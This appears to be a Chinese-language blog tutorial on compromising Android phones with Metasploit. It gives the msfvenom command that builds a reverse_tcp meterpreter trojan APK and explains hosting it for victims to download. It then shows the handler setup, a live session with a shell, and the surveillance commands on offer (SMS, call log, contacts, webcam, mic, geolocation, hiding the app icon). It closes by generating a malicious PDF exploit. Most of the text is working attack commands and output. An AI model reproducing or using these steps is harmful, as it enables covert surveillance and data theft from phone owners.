1. 程式人生 > >Metasploit入侵android

Metasploit入侵android

使用Metasploit 生成木馬apk

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.105 LPORT=4444 R > /root/webTest/test.apk

LHOST是接受反彈的shell

LPORT是監聽的埠

如果把地址指向公網伺服器,通過埠對映,轉發流量就可實現遠端的控制.

啟動apache服務

service apache2 start  訪問http://ip/test.apk  下載木馬

啟動 postgresql

 service postgresql start

啟動 msfconsole

msf > use exploit/multi/handler 
msf exploit(multi/handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(multi/handler) > show payloads 
太多載荷 省略了...

msf exploit(multi/handler) > set payload android/meterpreter/reverse_tcp 
payload => android/meterpreter/reverse_tcp
msf exploit(multi/handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (android/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(multi/handler) > set LHOST 192.168.1.105
msf exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.1.105:4444 

在android 安裝apk 執行

[*] Started reverse TCP handler on 192.168.1.105:4444 
[*] Sending stage (70525 bytes) to 192.168.1.106
[*] Meterpreter session 2 opened (192.168.1.105:4444 -> 192.168.1.106:40804) at 2018-10-12 22:50:21 +0800

meterpreter > 

連線成功!

meterpreter > sysinfo 
Computer    : localhost
OS          : Android 4.4.2 - Linux 3.10.30-00002-g71dd235 (armv7l)
Meterpreter : dalvik/android
meterpreter > shell 
Process 1 created.
Channel 1 created.
id
uid=10098(u0_a98) gid=10098(u0_a98) groups=1015(sdcard_rw),1023(media_rw),1028(sdcard_r),3003(inet),50098(all_a98) context=u:r:untrusted_app:s0

下載通話記錄 檢視簡訊 攝像頭的選擇 等等 

使用help檢視相關功能  

meterpreter > help 

Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information or control active channels
    close                     Closes a channel
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    get_timeouts              Get the current session timeout values
    guid                      Get the session GUID
    help                      Help menu
    info                      Displays information about a Post module
    irb                       Open an interactive Ruby shell on the current session
    load                      Load one or more meterpreter extensions
    machine_id                Get the MSF ID of the machine attached to the session
    pry                       Open the Pry debugger on the current session
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    sessions                  Quickly switch to another session
    set_timeouts              Set the current session timeout values
    sleep                     Force Meterpreter to go quiet, then re-establish session.
    transport                 Change the current transport mechanism
    use                       Deprecated alias for "load"
    uuid                      Get the UUID for the current session
    write                     Writes data to a channel


Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    checksum      Retrieve the checksum of a file
    cp            Copy source to destination
    dir           List files (alias for ls)
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lls           List local files
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    mv            Move source to destination
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    upload        Upload a file or directory


Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    portfwd       Forward a local port to a remote service
    route         View and modify the routing table


Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    execute       Execute a command
    getuid        Get the user that the server is running as
    localtime     Displays the target system's local date and time
    pgrep         Filter processes by name
    ps            List running processes
    shell         Drop into a system command shell
    sysinfo       Gets information about the remote system, such as OS


Stdapi: User interface Commands
===============================

    Command       Description
    -------       -----------
    screenshot    Grab a screenshot of the interactive desktop


Stdapi: Webcam Commands
=======================

    Command        Description
    -------        -----------
    record_mic     Record audio from the default microphone for X seconds
    webcam_chat    Start a video chat
    webcam_list    List webcams
    webcam_snap    Take a snapshot from the specified webcam
    webcam_stream  Play a video stream from the specified webcam


Stdapi: Audio Output Commands
=============================

    Command       Description
    -------       -----------
    play          play an audio file on target system, nothing written on disk


Android Commands
================

    Command           Description
    -------           -----------
    activity_start    Start an Android activity from a Uri string
    check_root        Check if device is rooted
    dump_calllog      Get call log
    dump_contacts     Get contacts list
    dump_sms          Get sms messages
    geolocate         Get current lat-long using geolocation
    hide_app_icon     Hide the app icon from the launcher
    interval_collect  Manage interval collection capabilities
    send_sms          Sends SMS from target session
    set_audio_mode    Set Ringer Mode
    sqlite_query      Query a SQLite database from storage
    wakelock          Enable/Disable Wakelock
    wlan_geolocate    Get current lat-long using WLAN informatio

android 漏洞利用

msf > search android

Matching Modules
================

   Name                                                       Disclosure Date  Rank       Description
   ----                                                       ---------------  ----       -----------
   auxiliary/admin/android/google_play_store_uxss_xframe_rce                   normal     Android Browser RCE Through Google Play Store XFO
   auxiliary/dos/android/android_stock_browser_iframe         2012-12-01       normal     Android Stock Browser Iframe DOS
   auxiliary/gather/android_browser_file_theft                                 normal     Android Browser File Theft
   auxiliary/gather/android_browser_new_tab_cookie_theft                       normal     Android Browser "Open in New Tab" Cookie Theft
   auxiliary/gather/android_htmlfileprovider                                   normal     Android Content Provider File Disclosure
   auxiliary/gather/android_object_tag_webview_uxss           2014-10-04       normal     Android Open Source Platform (AOSP) Browser UXSS
   auxiliary/gather/android_stock_browser_uxss                                 normal     Android Open Source Platform (AOSP) Browser UXSS
   auxiliary/gather/firefox_pdfjs_file_theft                                   normal     Firefox PDF.js Browser File Theft
   auxiliary/gather/samsung_browser_sop_bypass                2017-11-08       normal     Samsung Internet Browser SOP Bypass
   auxiliary/scanner/sip/sipdroid_ext_enum                                     normal     SIPDroid Extension Grabber
   auxiliary/server/android_browsable_msf_launch                               normal     Android Meterpreter Browsable Launcher
   auxiliary/server/android_mercury_parseuri                                   normal     Android Mercury Browser Intent URI Scheme and Directory Traversal Vulnerability
   exploit/android/adb/adb_server_exec                        2016-01-01       excellent  Android ADB Debug Server Remote Payload Execution
   exploit/android/browser/samsung_knox_smdm_url              2014-11-12       excellent  Samsung Galaxy KNOX Android Browser RCE
   exploit/android/browser/stagefright_mp4_tx3g_64bit         2015-08-13       normal     Android Stagefright MP4 tx3g Integer Overflow
   exploit/android/browser/webview_addjavascriptinterface     2012-12-21       excellent  Android Browser and WebView addJavascriptInterface Code Execution
   exploit/android/fileformat/adobe_reader_pdf_js_interface   2014-04-13       good       Adobe Reader for Android addJavascriptInterface Exploit
   exploit/android/local/futex_requeue                        2014-05-03       excellent  Android 'Towelroot' Futex Requeue Kernel Exploit
   exploit/android/local/put_user_vroot                       2013-09-06       excellent  Android get_user/put_user Exploit
   exploit/multi/hams/steamed                                 2018-04-01       manual     Steamed Hams
   exploit/multi/handler                                                       manual     Generic Payload Handler
   exploit/multi/local/allwinner_backdoor                     2016-04-30       excellent  Allwinner 3.4 Legacy Kernel Local Privilege Escalation
   payload/android/meterpreter/reverse_http                                    normal     Android Meterpreter, Android Reverse HTTP Stager
   payload/android/meterpreter/reverse_https                                   normal     Android Meterpreter, Android Reverse HTTPS Stager
   payload/android/meterpreter/reverse_tcp                                     normal     Android Meterpreter, Android Reverse TCP Stager
   payload/android/meterpreter_reverse_http                                    normal     Android Meterpreter Shell, Reverse HTTP Inline
   payload/android/meterpreter_reverse_https                                   normal     Android Meterpreter Shell, Reverse HTTPS Inline
   payload/android/meterpreter_reverse_tcp                                     normal     Android Meterpreter Shell, Reverse TCP Inline
   payload/android/shell/reverse_http                                          normal     Command Shell, Android Reverse HTTP Stager
   payload/android/shell/reverse_https                                         normal     Command Shell, Android Reverse HTTPS Stager
   payload/android/shell/reverse_tcp                                           normal     Command Shell, Android Reverse TCP Stager
   post/android/capture/screen                                                 normal     Android Screen Capture
   post/android/gather/sub_info                                                normal     extracts subscriber info from target device
   post/android/gather/wireless_ap                                             normal     Displays wireless SSIDs and PSKs
   post/android/manage/remove_lock                            2013-10-11       normal     Android Settings Remove Device Locks (4.0-4.3)
   post/android/manage/remove_lock_root                                        normal     Android Root Remove Device Locks (root)
   post/multi/gather/wlan_geolocate                                            normal     Multiplatform WLAN Enumeration and Geolocation
   post/multi/manage/play_youtube                                              normal     Multi Manage YouTube Broadcast
   post/multi/manage/set_wallpaper                                             normal     Multi Manage Set Wallpaper
   post/multi/recon/local_exploit_suggester                                    normal     Multi Recon Local Exploit Suggester


PDF木馬

msf exploit(android/fileformat/adobe_reader_pdf_js_interface) > set LHOST 192.168.1.105
LHOST => 192.168.1.105
msf exploit(android/fileformat/adobe_reader_pdf_js_interface) > show options 

Module options (exploit/android/fileformat/adobe_reader_pdf_js_interface):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   FILENAME          msf.pdf          yes       The file name.
   PDF::Encoder      ASCIIHEX         yes       Select encoder for JavaScript Stream, valid values are ASCII85, FLATE, and ASCIIHEX
   PDF::Method       DOCUMENT         yes       Select PAGE, DOCUMENT, or ANNOTATION
   PDF::MultiFilter  1                yes       Stack multiple encodings n times
   PDF::Obfuscate    true             yes       Whether or not we should obfuscate the output


Payload options (android/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.105    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

   **DisablePayloadHandler: True   (RHOST and RPORT settings will be ignored!)**


Exploit target:

   Id  Name
   --  ----
   0   Android ARM


msf exploit(android/fileformat/adobe_reader_pdf_js_interface) > exploit 

[*] Generating Javascript exploit...
[*] Creating PDF...
[+] msf.pdf stored at /root/.msf4/local/msf.pdf